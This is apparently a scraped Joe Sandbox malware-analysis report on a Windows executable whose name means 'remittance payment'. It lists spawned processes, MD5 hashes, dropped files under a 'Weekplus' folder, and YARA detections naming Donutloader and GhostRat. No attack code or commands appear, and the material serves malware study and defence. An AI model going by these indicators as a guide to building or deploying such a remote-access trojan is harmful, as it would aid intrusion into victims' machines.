run in DOS mode.$PEdg" @ `@@@

Target ID:	0
Start time:	07:35:04
Start date:	16/01/2025
Path:	C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe"
Imagebase:	0xed0000
File size:	23'566'848 bytes
MD5 hash:	EABC234727934AD76F332E7CFB28C80B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2564910730.000000001E430000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2566214596.00000000202C5000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:35:21
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\APP.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Weekplus\APP.exe"
Imagebase:	0x680000
File size:	5'632 bytes
MD5 hash:	53F534B5BE5BD54C0BBD6168C510776E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:35:26
Start date:	16/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:35:34
Start date:	16/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 3160 -s 2900
Imagebase:	0x7ff70c250000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:35:35
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Weekplus\GamePlusPlus.exe" 1
Imagebase:	0x7ff646e80000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000A.00000002.2494156161.00000196FB690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000A.00000002.2494581238.00000196FBA70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000A.00000002.2493857823.00000196F9E07000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:35:35
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff646e80000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:35:36
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff646e80000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:35:36
Start date:	16/01/2025
Path:	C:\Program Files\Weekplus\GamePlusPlus.exe
Wow64 process (32bit):	false
Commandline:	vrdashboard.exe -duplication_gpu_check
Imagebase:	0x7ff646e80000
File size:	251'488 bytes
MD5 hash:	8038EBB15EC202AD0A25564E55CDF32D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:35:37
Start date:	16/01/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6276 -s 1380
Imagebase:	0x7ff70c250000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U6c47#U8054#U652f#U4ed8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Weekplus\APP.exe

C:\Program Files\Weekplus\GamePlusPlus.exe

C:\Program Files\Weekplus\mpclient.dat

C:\Program Files\Weekplus\mpclient64.dat

C:\Program Files\Weekplus\openvr_api.dll

C:\Program Files\Weekplus\steam_api64.dll

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_#U6c47#U8054#U65_3d90b833433f75c511439ed5e6d61f102049a62d_6b7b5bfd_b5b50cd5-d1c3-46b1-9850-a9839225552b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_GamePlusPlus.exe_a30617e1a5ff2d8bd3ddff2e634754382565ca_54de7261_34cb2866-c026-4add-a4f0-44d33bca9f3f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA028.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA2F8.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA385.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA875.tmp.dmp

Windows Analysis Report
#U6c47#U8054#U652f#U4ed8.exe